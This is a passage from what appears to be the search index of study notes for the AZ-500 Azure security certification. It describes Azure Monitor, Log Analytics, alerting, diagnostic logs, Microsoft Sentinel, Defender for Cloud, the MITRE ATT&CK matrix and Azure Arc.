                            • Azure tenant monitoring data\u00a0- Data about the operation of tenant-level Azure services, such as Microsoft Entra ID. The Microsoft Entra audits and sign-ins are examples of tenant monitoring data. This data can be collected using a tenant diagnostic setting.

                            Some of the features of Microsoft Sentinel are:

                            • More than 100 built-in alert rules
                              • Sentinel's alert rule wizard to create your own.
                              • Alerts can be triggered by a single event or based on a threshold, or by correlating different datasets or by using built-in machine learning algorithms.
                            • Jupyter Notebooks\u00a0that use a growing collection of hunting queries, exploratory queries, and python libraries.
                            • Investigation graph\u00a0for visualizing and traversing the connections between entities like users, assets, applications, or URLs and related activities like logins, data transfers, or application usage to rapidly understand the scope and impact of an incident.

                            To on-board Microsoft Sentinel: - Enable it - Connect your data sources with connectors that include Microsoft Threat Protection solutions,\u00a0Microsoft 365 sources, Microsoft Entra ID, Azure ATP, and\u00a0Microsoft Cloud App Security. In addition, there are built-in connectors to the broader security ecosystem for non-Microsoft solutions. You can also use common event format, Syslog or REST-API to connect your data sources with Azure Sentinel. - After you connect your data sources, choose from a gallery of expertly created dashboards that surface insights based on your data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#12-configure-and-monitor-metrics-and-logs","title":"1.2. Configure and monitor metrics and logs","text":"

                            All data that Azure Monitor collects fits into one of two fundamental types:\u00a0metrics or logs.

                            Azure Monitor Metrics. - Metrics are numerical values that are collected at regular intervals and describe some aspect of a system at a particular time. There are multiple types of metrics supported by Azure Monitor Metrics:

                            • Native metrics\u00a0use tools in Azure Monitor for analysis and alerting.
                              • Platform metrics are collected from Azure resources. They require no configuration and have no cost.
                              • Custom metrics are collected from different sources that you configure, including applications and agents running on virtual machines.
                            • Prometheus metrics\u00a0(preview) are collected from Kubernetes clusters, including Azure Kubernetes Service (AKS), and use industry-standard tools for analyzing and alerting, such as PromQL and Grafana.

                            What is Prometheus?\u00a0Prometheus is an\u00a0open-source toolkit\u00a0that\u00a0collects data\u00a0for\u00a0monitoring\u00a0and\u00a0alerting.

                            Prometheus Features:

                            • A multi-dimensional data model with time series data identified by metric name and key/value pairs
                            • PromQL (PromQL component called Prom Kubernetes - an extension to support Prometheus) provides a flexible query language to use this dimensionality.
                            • Time series collection happens via a pull model over Hypertext Transfer Protocol (HTTP)
                            • Pushing time series is supported via an intermediary gateway
                            • Targets are discovered via service discovery or static configuration

                            What is Azure Managed Grafana?

                            Azure Managed Grafana is a data visualization platform built on top of the Grafana software by Grafana Labs. It's built as a fully managed Azure service operated and supported by Microsoft. Grafana helps you combine metrics, logs, and traces into a single user interface. With its extensive support for data sources and graphing capabilities, you can view and analyze your application and infrastructure telemetry data in real-time.

                            Azure Managed Grafana\u00a0is optimized for the Azure environment. It works seamlessly with many Azure services. Specifically, for the current preview, it provides with the following integration features:

                            • Built-in support for Azure Monitor and Azure Data Explorer
                            • User authentication and access control using Microsoft Entra identities
                            • Direct import of existing charts from the Azure portal

                            Why use Azure Managed Grafana?

                            Managed Grafana\u00a0lets you bring together all your telemetry data into one place. It can access various data sources supported, including your data stores in Azure and elsewhere.

                            As a fully managed service, Azure Managed Grafana lets you deploy Grafana without having to deal with setup. The service provides high availability, service level agreement (SLA) guarantees, and automatic software updates.

                            You can share Grafana dashboards with people inside and outside your organization and allow others to join in for monitoring or troubleshooting. Managed Grafana uses\u00a0Microsoft Entra ID\u2019s centralized identity management, which allows you to control which users can use a Grafana instance, and you can use managed identities to access Azure data stores, such as Azure Monitor.

                            You can create dashboards instantaneously by importing existing charts directly from the Azure portal or by using prebuilt dashboards.

                            Summarizing:

                            Category Native platform metrics Native custom metrics Prometheus metrics\u00a0(preview) Sources Azure resources Azure Monitor agent Application Insights Representational State Transfer (REST) Application Programming Interface (API) Azure Kubernetes Service (AKS) cluster Any Kubernetes cluster through remote-write Configuration None Varies by source Enable Azure Monitor managed service for Prometheus Stored Subscription Subscription Azure Monitor workspace Cost No Yes Yes (free during preview) Aggregation pre-aggregated pre-aggregated raw data Analyze Metrics Explorer Metrics Explorer Prometheus Querying (PromQL) LanguageGrafana dashboards Alert metrics alert rule metrics alert rule Prometheus alert rule Visualize WorkbooksAzure dashboardGrafana WorkbooksAzure dashboardGrafana Grafana Retrieve Azure Command-Line Interface (CLI) Azure PowerShell cmdletsRepresentational State Transfer (REST) Application Programming Interface (API) or client library.NETGoJavaJavaScriptPython Azure Command-Line Interface (CLI) Azure PowerShell cmdletsRepresentational State Transfer (REST) Application Programming Interface (API) or client library.NETGoJavaJavaScriptPython Grafana

                            Azure Monitor collects metrics from the following sources. After these metrics are collected in the Azure Monitor metric database, they can be evaluated together regardless of their source:

                            • Azure resources:\u00a0Platform metrics are created by Azure resources and give you visibility into their health and performance. Each type of resource creates a distinct set of metrics without any configuration required. Platform metrics are collected from Azure resources at a one-minute frequency unless specified otherwise in the metric's definition.
                            • Applications:\u00a0Application Insights creates metrics for your monitored applications to help you detect performance issues and track trends in how your application is used. Values include Server response time and Browser exceptions.
                            • Virtual machine agents:\u00a0Metrics are collected from the guest operating system of a virtual machine. You can enable guest operating system (OS) metrics for Windows virtual machines using the Windows diagnostic extension and Linux virtual machines by using the InfluxData Telegraf agent.
                            • Custom metrics:\u00a0You can define metrics in addition to the standard metrics that are automatically available. You can define custom metrics in your application that are monitored by Application Insights. You can also create custom metrics for an Azure service by using the custom metrics Application Programming Interface (API).
                            • Kubernetes clusters:\u00a0Kubernetes clusters typically send metric data to a local Prometheus server that you must maintain. Azure Monitor managed service for Prometheus provides a managed service that collects metrics from Kubernetes clusters and stores them in Azure Monitor Metrics.

                            A common type of log entry is an event, which is collected sporadically.

                            Applications can create custom logs by using the structure that they need.

                            Metric data can even be stored in Logs to combine them with other monitoring data for trending and other data analysis.

                            KQL (Kusto query language). - Data in Azure Monitor Logs is retrieved using a log query written with the Kusto query language, which allows you to quickly retrieve, consolidate, and analyze collected data. \u00a0Use Log Analytics to write and test log queries in the Azure portal. It allows you to work with results interactively or pin them to a dashboard to view them with other visualizations.

                            Security tools use of Monitor logs:

                            • Microsoft Defender for Cloud\u00a0stores data that it collects in a Log Analytics workspace where it can be analyzed with other log data.
                            • Azure Sentinel\u00a0stores data from data sources into a Log Analytics workspace.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#13-enable-log-analytics","title":"1.3. Enable Log Analytics","text":"

                            Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results. Even if a log query is used elsewhere in Azure Monitor, you'll typically write and test the query first using Log Analytics.

                            You can start Log Analytics from several places in the Azure portal. The scope of the data available to Log Analytics is determined by how you start it.

                            • Select Logs from the Azure Monitor menu or Log Analytics workspaces menu.
                            • Select Analytics from the Overview page of an Application Insights application.
                            • Select Logs from the menu of an Azure resource.

                            In addition to interactively working with log queries and their results in Log Analytics, areas in Azure Monitor where you will use queries include the following:

                            • Alert rules. Alert rules proactively identify issues from data in your workspace. Each alert rule is based on a log search that is automatically run at regular intervals. The results are inspected to determine if an alert should be created.
                            • Dashboards. You can pin the results of any query into an Azure dashboard which allow you to visualize log and metric data together and optionally share with other Azure users.
                            • Views. You can create visualizations of data to be included in user dashboards with View Designer. Log queries provide the data used by tiles and visualization parts in each view.
                            • Export. When you import log data from Azure Monitor into Excel or Power BI, you create a log query to define the data to export.
                            • PowerShell. Use the results of a log query in a PowerShell script from a command line or an Azure Automation runbook that uses\u00a0Invoke-AzOperationalInsightsQuery.
                            • Azure Monitor Logs API. The Azure Monitor Logs API allows any REST API client to retrieve log data from the workspace. The API request includes a query that is run against Azure Monitor to determine the data to retrieve.

                            At the center of Log Analytics is the Log Analytics workspace, which is hosted in Azure. - - Log Analytics collects data in the workspace from connected sources by configuring data sources and adding solutions to your subscription. - Data sources and solutions each create different record types, each with its own set of properties. - You can still analyze sources and solutions together in queries to the workspace. - A Log Analytics workspace is a unique environment for Azure Monitor log data. - \u00a0Each workspace has its own data repository and configuration, and data sources and solutions are configured to store their data in a particular workspace. - \u00a0You require a Log Analytics workspace if you intend on collecting data from the following sources: - Azure resources in your subscription - On-premises computers monitored by System Center Operations Manager - Device collections from Configuration Manager - Diagnostics or log data from Azure storage

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#14-manage-connected-sources-for-log-analytics","title":"1.4. Manage connected sources for log analytics","text":"
                            • The Azure Log Analytics agent was developed for comprehensive management across virtual machines in any cloud, on-premises machines, and those monitored by System Center Operations Manager.
                            • The Windows and Linux agents send collected data from different sources to your Log Analytics workspace in Azure Monitor, as well as any unique logs or metrics as defined in a monitoring solution.
                            • The Log Analytics agent also supports insights and other services in Azure Monitor such as Azure Monitor for VMs, Microsoft Defender for Cloud, and Azure Automation.

                            There is something else called Azure diagnostics extension, that basically collects monitoring data from the guest operating system of Azure virtual machines. Differences:

                            Azure Diagnostics Extension Log Analytics agent Used only with Azure virtual machines. Used with virtual machines in Azure, other clouds, and on-premises. Sends data to Azure Storage, Azure Monitor Metrics (Windows only) and Event Hubs. Sends data to Azure Monitor Logs (to an Log Analytics Workspace). Not required specifically Required for: Azure Monitor for VMs, and other services such as Microsoft Defender for Cloud.

                            The Windows agent can be multihomed to send data to multiple workspaces and System Center Operations Manager management groups. The Linux agent can send to only a single destination. The agent for Linux and Windows isn't only for connecting to Azure Monitor, it also supports Azure Automation to host the Hybrid Runbook worker role and other services such as Change Tracking, Update Management, and Microsoft Defender for Cloud.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#15-enable-azure-monitor-alerts","title":"1.5. Enable Azure monitor Alerts","text":"

                            Azure monitor has metrics, logging, and analytics features. Another feature is Monitor Alerts.

                            Alerts in Azure Monitor proactively notify you of critical conditions and potentially attempt to take corrective action. Alert rules based on metrics provide near real time alerting based on numeric values, while rules based on logs allow for complex logic across data from multiple sources.

                            The unified alert experience in Azure Monitor includes alerts that were previously managed by Log Analytics and Application Insights. In the past, Azure Monitor, Application Insights, Log Analytics, and Service Health had separate alerting capabilities. Over time, Azure improved and combined both the user interface and different methods of alerting. The consolidation is still in process.

                            • The alert rule captures the target and criteria for alerting. \u00a0The alert rule can be in an enabled or a disabled state. Alerts only fire when enabled.
                            • Target Resource: Defines the scope and signals available for alerting. A target can be any Azure resource. Example targets: a virtual machine, a storage account, a virtual machine scale set, a Log Analytics workspace, or an Application Insights resource. For certain resources (like virtual machines), you can specify multiple resources as the target of the alert rule.
                            • Signal: Emitted by the target resource. Signals can be of the following types: metric, activity log, Application Insights, and log.
                            • Criteria: A combination of signal and logic applied on a target resource. Examples:
                              • Percentage CPU > 70%
                              • Server Response Time > 4 ms
                              • Result count of a log query > 100
                            • Alert Name: A specific name for the alert rule configured by the user.
                            • Alert Description: A description for the alert rule configured by the user.
                            • Severity: The severity of the alert after the criteria specified in the alert rule is met. Severity can range from 0 to 4.
                              • Sev 0 = Critical
                              • Sev 1 = Error
                              • Sev 2 = Warning
                              • Sev 3 = Informational
                              • Sev 4 = Verbose
                            • Action: A specific action taken when the alert is fired.

                            You can alert on metrics and logs. These include but are not limited to:

                            • Metric values
                            • Log search queries
                            • Activity log events
                            • Health of the underlying Azure platform
                            • Tests for website availability

                            With the consolidation of alerting services still in process, there are some alerting capabilities that are not yet in the new alerts system.

                            Monitor source Signal type Description Service health Activity log Not supported. View Create activity log alerts on service notifications. Application Insights Web availability tests Not supported. View Web test alerts. Available to any website that's instrumented to send data to Application Insights. Receive a notification when availability or responsiveness of a website is below expectations.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#16-create-diagnostic-settings-in-azure-portal","title":"1.6. Create diagnostic settings in Azure portal","text":"

                            Azure Monitor diagnostic logs are logs produced by an Azure service that provide rich, frequently collected data about the operation of that service. Azure Monitor makes two types of diagnostic logs available:

                            • Tenant logs. These logs come from tenant-level services that exist outside an Azure subscription, such as Microsoft Entra ID.
                            • Resource logs. These logs come from Azure services that deploy resources within an Azure subscription, such as Network Security Groups (NSGs) or storage accounts.

                            These logs differ from the\u00a0activity log. The activity log provides insight into the operations, such as creating a VM or deleting a logic app, that Azure Resource Manager performed on resources in your subscription using. The activity log is a subscription-level log. Resource-level diagnostic logs provide insight into operations that were performed within that resource itself, such as getting a secret from a key vault.

                            These logs also differ from\u00a0guest operating system (OS)\u2013level diagnostic logs. Guest OS diagnostic logs are those collected by an agent running inside a VM or other supported resource type. Resource-level diagnostic logs require no agent and capture resource-specific data from the Azure platform itself, whereas guest OS\u2013level diagnostic logs capture data from the OS and applications running on a VM.

                            You can configure diagnostic settings in the Azure portal either from the Azure Monitor menu or from the menu for the resource.

                            Here are some of the things you can do with diagnostic logs:

                            • Save them to a storage account for auditing or manual inspection. You can specify the retention time (in days) by using resource diagnostic settings.
                            • Stream them to event hubs for ingestion by a third-party service or custom analytics solution, such as Power BI.
                            • Analyze them with Azure Monitor, such that the data is immediately written to Azure Monitor with no need to first write the data to storage.
                            • An event hub is created in the namespace for each log category you enable. A diagnostic log category is a type of log that a resource may collect.

                            Kusto Query Language. All data is retrieved from a Log Analytics workspace using a log query written using Kusto Query Language (KQL). You can write your own queries or use solutions and insights that include log queries for an application or service.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#2-enable-and-manage-microsoft-defender-for-cloud","title":"2. Enable and manage Microsoft Defender for Cloud","text":"

                            Microsoft Defender for Cloud is your central location for setting and monitoring your organization's security posture.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#21-the-mitre-attack-matrix","title":"2.1. The MITRE Attack matrix","text":"

                            The MITRE ATT&CK matrix is a\u00a0publicly accessible knowledge base\u00a0for understanding the various\u00a0tactics\u00a0and\u00a0techniques\u00a0used by attackers during a cyberattack.

                            The knowledge base is organized into several categories:\u00a0pre-attack,\u00a0initial access,\u00a0execution,\u00a0persistence,\u00a0privilege escalation,\u00a0defense evasion,\u00a0credential access,\u00a0discovery,\u00a0lateral movement,\u00a0collection,\u00a0exfiltration, and\u00a0command and control.

                            Tactics (T)\u00a0represent the \"why\" of an ATT&CK technique or sub-technique. It is the adversary's tactical goal: the reason for performing an action.\u00a0For example, an adversary may want to achieve credential access.

                            Techniques (T)\u00a0represent \"how'\" an adversary achieves a tactical goal by performing an action.\u00a0For example, an adversary may dump credentials to achieve credential access.

                            Common Knowledge (CK)\u00a0in ATT&CK stands for common knowledge, essentially the documented modus operandi of tactics and techniques executed by adversaries.

                            Defender for Cloud\u00a0uses the MITRE Attack matrix to associate alerts with their perceived intent, helping formalize security domain knowledge.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#22-implement-microsoft-defender-for-cloud","title":"2.2. Implement Microsoft Defender for Cloud","text":"

                            Microsoft Defender for Cloud is a solution for\u00a0cloud security posture management (CSPM)\u00a0and\u00a0cloud workload protection (CWP)\u00a0that finds weak spots across your cloud configuration, helps strengthen the overall security posture of your environment, and can protect workloads across multicloud and hybrid environments from evolving threats.

                            When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multicloud environments,\u00a0Microsoft Defender plans are extended to non-Azure machines\u00a0with the help of\u00a0Azure Arc.\u00a0Cloud Security Posture Management (CSPM) features\u00a0are extended to multicloud machines without the need for any agents.

                            In addition to defending your Azure environment, you can\u00a0add Defender for Cloud capabilities to your hybrid cloud environment to protect your non-Azure servers. To\u00a0extend protection\u00a0to on-premises machines,\u00a0deploy Azure Arc\u00a0and\u00a0enable Defender for Cloud's enhanced security features.

                            For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

                            • Defender for Cloud's CSPM features\u00a0extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and these are included in your secure score. The resources will also be assessed for compliance with built-in standards specific to\u00a0AWS (AWS Center for Internet Security (CIS),\u00a0AWS Payment Card Industry (PCI) Data Security Standards (DSS), and\u00a0AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multicloud enabled feature helping you manage your AWS resources alongside your Azure resources.
                            • Microsoft Defender for Kubernetes extends\u00a0its container threat detection and advanced defenses to your Amazon Elastic Kubernetes Service (EKS) Linux clusters.
                            • Microsoft Defender for Servers\u00a0brings threat detection and advanced defenses to your Windows and Linux Elastic Compute Cloud 2 (EC2) instances. This plan includes the integrated license for Microsoft Defender for Endpoint, security baselines, and OS level assessments, vulnerability assessment scanning, adaptive application controls (AAC), file integrity monitoring (FIM), and more.

                            Defender for Cloud includes vulnerability assessment solutions for\u00a0virtual machines, container registries, and\u00a0SQL servers\u00a0as part of the enhanced security features. Some of the scanners are powered by Qualys. But you don't need a Qualys license or even a Qualys account - everything's handled seamlessly inside Defender for Cloud.

                            Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint. With this integration enabled, you'll have access to the vulnerability findings from Microsoft Defender Vulnerability Management.

                            The list of recommendations is enabled and supported by the Microsoft cloud security benchmark. This Microsoft-authored benchmark, based on common compliance frameworks, began with Azure and now provides a set of guidelines for security and compliance best practices for multiple cloud environments. In this way, Defender for Cloud enables you not just to set security policies but to\u00a0apply secure configuration standards across your resources.

                            Microsoft Defender for the\u00a0Internet of Things (IoT)\u00a0is a separate product.

                            The\u00a0Defender plans\u00a0of Microsoft Defender for Cloud offer comprehensive defenses for the\u00a0compute,\u00a0data, and\u00a0service layers\u00a0of your environment:

                            • Microsoft Defender for Servers
                            • Microsoft Defender for Storage
                            • Microsoft Defender for Structured Query Language (SQL)
                            • Microsoft Defender for Containers
                            • Microsoft Defender for App Service
                            • Microsoft Defender for Key Vault
                            • Microsoft Defender for Resource Manager
                            • Microsoft Defender for Domain Name System (DNS)
                            • Microsoft Defender for open-source relational databases
                            • Microsoft Defender for Azure Cosmos Database (DB)
                            • Defender Cloud Security Posture Management (CSPM)
                              • Security governance and regulatory compliance
                              • Cloud security explorer
                              • Attack path analysis
                              • Agentless scanning for machines
                            • Defender for DevOps
                            • Security alerts\u00a0- When Defender for Cloud\u00a0detects a threat\u00a0in any area of your environment, it\u00a0generates a security alert. These alerts describe details of the\u00a0affected resources,\u00a0suggested remediation steps, and in some cases, an\u00a0option to trigger a logic app in response. Whether an alert is generated by Defender for Cloud or received by Defender for Cloud from an integrated security product, you can export it. To export your alerts to Microsoft Sentinel, any third-party Security information and event management (SIEM), or any other external tool, follow the instructions in Stream alerts to a SIEM, Security orchestration, automation and response (SOAR), or IT Service Management solution. Defender for Cloud's threat protection includes\u00a0fusion kill-chain analysis, which automatically correlates alerts in your environment based on cyber kill-chain analysis, to help you better understand the full story of an attack campaign, where it started, and what kind of impact it had on your resources.\u00a0Defender for Cloud's supported kill chain intents are based on version 9 of the MITRE ATT&CK matrix.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#23-cloud-security-posture-management-cspm-remediate-security-issues-and-watch-your-security-posture-improve-security-posture-tab-regulatory-compliance-tab","title":"2.3. Cloud Security Posture Management (CSPM) - Remediate security issues and watch your security posture improve - Security posture tab + Regulatory compliance tab","text":"

                            Defender for Cloud continually assesses your resources, subscriptions, and organization for security issues and shows your security posture in the secure score, an aggregated score of the security findings that tells you, at a glance, your current security situation: the higher the score, the lower the identified risk level.

                            • Generates a secure score\u00a0for your subscriptions based on an assessment of your connected resources compared with the guidance in the\u00a0Microsoft cloud security benchmark.
                            • Provides hardening recommendations\u00a0based on any\u00a0identified security misconfigurations\u00a0and\u00a0weaknesses.
                            • Analyzes and secure's your attack paths\u00a0through the cloud security graph, which is a graph-based context engine that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.
                            • Attack path analysis is a\u00a0graph-based algorithm that scans the cloud security graph. The\u00a0scans expose exploitable paths attackers may use to breach your environment to reach your high-impact assets.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#24-workload-protections-tab","title":"2.4. Workload protections tab","text":"

                            Defender for Cloud offers security alerts that are powered by Microsoft Threat Intelligence. It also includes a range of advanced, intelligent protections for your workloads. The workload protections are provided through Microsoft Defender plans specific to the types of resources in your subscriptions.

                            The Cloud workload dashboard includes the following sections:

                            1. Microsoft Defender for Cloud coverage\u00a0- Here you can see the resources types in your subscription that are eligible for protection by Defender for Cloud. Wherever relevant, you can upgrade here as well. If you want to upgrade all possible eligible resources, select\u00a0Upgrade all.
                            2. Security alerts\u00a0- When Defender for Cloud detects a threat in any area of your environment, it generates an alert. These alerts describe details of the affected resources, suggested remediation steps, and in some cases an option to\u00a0trigger a logic app\u00a0in response. Selecting anywhere in this graph opens the Security alerts page.
                            3. Advanced protection\u00a0- Defender for Cloud includes many advanced threat protection capabilities for virtual machines,\u00a0Structured Query Language (SQL)\u00a0databases, containers, web applications, your network, and more. In this advanced protection section, you can see the status of the resources in your selected subscriptions for each of these protections. Select any of them to go directly to the configuration area for that protection type.
                            4. Insights\u00a0- This rolling pane of news, suggested reading, and high priority alerts gives Defender for Cloud's insights into pressing security matters that are relevant to you and your subscription. Whether it's a list of high severity\u00a0Common Vulnerabilities and Exposures (CVEs)\u00a0discovered on your VMs by a vulnerability analysis tool, or a new blog post by a member of the Defender for Cloud team, you'll find it here in the Insights panel.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#25-deploy-microsoft-defender-for-cloud","title":"2.5. Deploy Microsoft Defender for Cloud","text":"

                            Defender for Cloud provides foundational\u00a0cloud security and posture management (CSPM)\u00a0features by default.

                            Defender for cloud\u00a0offers foundational multicloud CSPM capabilities for free. The foundational CSPM includes a\u00a0secure score,\u00a0security policy and basic recommendations, and\u00a0network security assessment\u00a0to help you\u00a0protect your Azure resources.

                            The optional Defender CSPM plan provides advanced posture management capabilities such as\u00a0Attack path analysis,\u00a0Cloud security explorer,\u00a0advanced threat hunting,\u00a0security governance capabilities, and also tools to assess your security compliance with a wide range of benchmarks, regulatory standards, and any custom security policies required in your organization, industry, or region.

                            When you enabled Defender plans on an entire Azure subscription, the protections are inherited by all resources in the subscription. When you enable the enhanced security features (paid), Defender for Cloud can provide unified security management and threat protection across your hybrid cloud workloads, including:

                            • Microsoft Defender for Endpoint\u00a0- Microsoft Defender for Servers includes Microsoft Defender for Endpoint for comprehensive endpoint detection and response (EDR).

                            • Vulnerability assessment for virtual machines, container registries, and SQL resources

                            • Multicloud security\u00a0- Connect your accounts from Amazon Web Services (AWS) and Google Cloud Platform (GCP) to protect resources and workloads on those platforms with a range of Microsoft Defender for Cloud security features.

                            • Hybrid security\u00a0\u2013 Get a unified view of security across all of your on-premises and cloud workloads.

                            • Threat protection alerts\u00a0- Advanced behavioral analytics and the Microsoft Intelligent Security Graph provide an edge over evolving cyber-attacks. Built-in behavioral analytics and machine learning can identify attacks and zero-day exploits. Monitor networks, machines, data stores (SQL servers hosted inside and outside Azure, Azure SQL databases, Azure SQL Managed Instance, and Azure Storage), and cloud services for incoming attacks and post-breach activity. Streamline investigation with interactive tools and contextual threat intelligence.

                            • Track compliance with a range of standards\u00a0- Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the Microsoft cloud security benchmark. When you enable enhanced security features, you can apply a range of other industry standards, regulatory standards, and benchmarks according to your organization's needs. Add standards and track your compliance with them from the regulatory compliance dashboard.

                            • Access and application controls\u00a0- Block malware and other unwanted applications by applying machine learning-powered recommendations adapted to your specific workloads to create allowlists and blocklists. Reduce the network attack surface with just-in-time, controlled access to management ports on Azure VMs. Access and application control drastically reduce exposure to brute force and other network attacks.

                            • Container security features\u00a0- Benefit from vulnerability management and real-time threat protection in your containerized environments. Charges are based on the number of unique container images pushed to your connected registry. After an image has been scanned once, you won't be charged for it again unless it's modified and pushed once more.

                            • Breadth threat protection for resources connected to Azure\u00a0- Cloud-native threat protection for the Azure services common to all of your resources: Azure Resource Manager, Azure Domain Name System (DNS), Azure network layer, and Azure Key Vault. Defender for Cloud has unique visibility into the Azure management layer and the Azure DNS layer and can therefore protect cloud resources that are connected to those layers.

                            Manage your Cloud Security Posture Management (CSPM)\u00a0- CSPM offers you the ability to remediate security issues and review your security posture through the tools provided. These tools include:

                            • Security governance and regulatory compliance
                              • What is Security governance and regulatory compliance? Security governance and regulatory compliance refer to the policies and processes which organizations have in place to ensure that they comply with laws, rules, and regulations put in place by external bodies (government) that control activity in a given jurisdiction. Defender for Cloud allows you to view your regulatory compliance through the regulatory compliance dashboard. Defender for Cloud continuously assesses your hybrid cloud environment to analyze the risk factors according to the controls and best practices in the standards you've applied to your subscriptions. The dashboard reflects the status of your compliance with these standards.
                            • Cloud security graph
                              • What is a cloud security graph? The cloud security graph is a\u00a0graph-based context engine\u00a0that exists within Defender for Cloud. The cloud security graph collects data from your multicloud environment and other data sources.\u00a0For example, the cloud assets inventory, connections and lateral movement possibilities between resources, exposure to the internet, permissions, network connections, vulnerabilities, and more. The data collected is then used to build a graph representing your multicloud environment. Defender for Cloud then uses the generated graph to perform an attack path analysis and find the issues with the highest risk that exist within your environment. You can also query the graph using the cloud security explorer.
                            • Attack path analysis
                              • What is Attack path analysis? Attack path analysis helps you to\u00a0address the security issues that pose immediate threats with the greatest potential of being exploited in your environment. Defender for Cloud analyzes which security issues are part of potential attack paths that attackers could use to breach your environment. It also highlights the security recommendations that need to be resolved in order to mitigate the issue.
                            • Agentless scanning for machines
                              • What is agentless scanning for machines? Microsoft Defender for Cloud maximizes coverage on OS posture issues and extends beyond the reach of agent-based assessments. With agentless scanning for VMs, you can get frictionless, wide, and instant visibility on actionable posture issues without installed agents, network connectivity requirements, or machine performance impact.\u00a0Agentless scanning for VMs provides vulnerability assessment and software inventory\u00a0powered by Defender vulnerability management in Azure and Amazon AWS environments. Agentless scanning is available in Defender Cloud Security Posture Management (CSPM) and Defender for Servers.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#26-azure-arc","title":"2.6. Azure Arc","text":"

                            Azure Arc provides a centralized, unified way to:

                            • Manage your entire environment together by projecting your existing non-Azure and/or on-premises resources into Azure Resource Manager.
                            • Manage virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
                            • Use familiar Azure services and management capabilities, regardless of where they live.
                            • Continue using traditional IT operations (ITOps) while introducing DevOps practices to support new cloud-native patterns in your environment.
                            • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

                            Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

                            • Servers: Manage Windows and Linux physical servers and virtual machines hosted outside of Azure.
                            • Kubernetes clusters: Attach and configure Kubernetes clusters running anywhere with multiple supported distributions.
                            • Azure data services: Run Azure data services on-premises, at the edge, and in public clouds using Kubernetes and the infrastructure of your choice. SQL Managed Instance and PostgreSQL server (preview) services are currently available.
                            • SQL Server: Extend Azure services to SQL Server instances hosted outside of Azure.
                            • Virtual machines (preview): Provision, resize, delete, and manage virtual machines based on VMware vSphere or Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0and enable VM self-service through role-based access.

                            Some of the key scenarios that Azure Arc supports are:

                            • Implement consistent inventory, management, governance, and security for servers across your environment.
                            • Configure Azure VM extensions to use Azure management services to monitor, secure, and update your servers.
                            • Manage and govern Kubernetes clusters at scale.
                            • Use GitOps to deploy configuration across one or more clusters from Git repositories.
                            • Zero-touch compliance and configuration for Kubernetes clusters using Azure Policy.
                            • Run Azure data services on any Kubernetes environment as if it runs in Azure (specifically Azure SQL Managed Instance and Azure Database for PostgreSQL server, with benefits such as upgrades, updates, security, and monitoring). Use elastic scale and apply updates without any application downtime, even without continuous connection to Azure.
                            • Create custom locations on top of your Azure Arc-enabled Kubernetes clusters, using them as target locations for deploying Azure services instances. Deploy your Azure service cluster extensions for Azure Arc-enabled data services, App services on Azure Arc (including web, function, and logic apps), and Event Grid on Kubernetes.
                            • Perform virtual machine lifecycle and management operations for VMware vSphere and Azure Stack\u00a0hyper-converged infrastructure (HCI)\u00a0environments.
                            • A unified experience viewing your Azure Arc-enabled resources, whether you are using the Azure portal, the Azure CLI, Azure PowerShell, or Azure REST API.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#27-microsoft-cloud-security-benchmark","title":"2.7. Microsoft cloud security benchmark","text":"

                            Located at Defender > Regulatory compliance

                            The\u00a0Microsoft cloud security benchmark (MCSB)\u00a0provides\u00a0prescriptive best practices\u00a0and\u00a0recommendations\u00a0to help improve the security of workloads, data, and services on Azure and your multi-cloud environment, focusing on cloud-centric control areas with input from a set of holistic Microsoft and industry security guidance that includes:

                            • Cloud Adoption Framework: Guidance on\u00a0security, including\u00a0strategy,\u00a0roles\u00a0and\u00a0responsibilities,\u00a0Azure Top 10 Security Best Practices, and\u00a0reference implementation.
                            • Azure Well-Architected Framework: Guidance on securing your workloads on Azure.
                            • The Chief Information Security Officer (CISO) Workshop: Program guidance and reference strategies to accelerate security modernization using Zero Trust principles.
                            • Other industry and cloud service provider's security best practice standards and framework: Examples include the Amazon Web Services (AWS) Well-Architected Framework, Center for Internet Security (CIS) Controls, National Institute of Standards and Technology (NIST), and Payment Card Industry Data Security Standard (PCI-DSS).
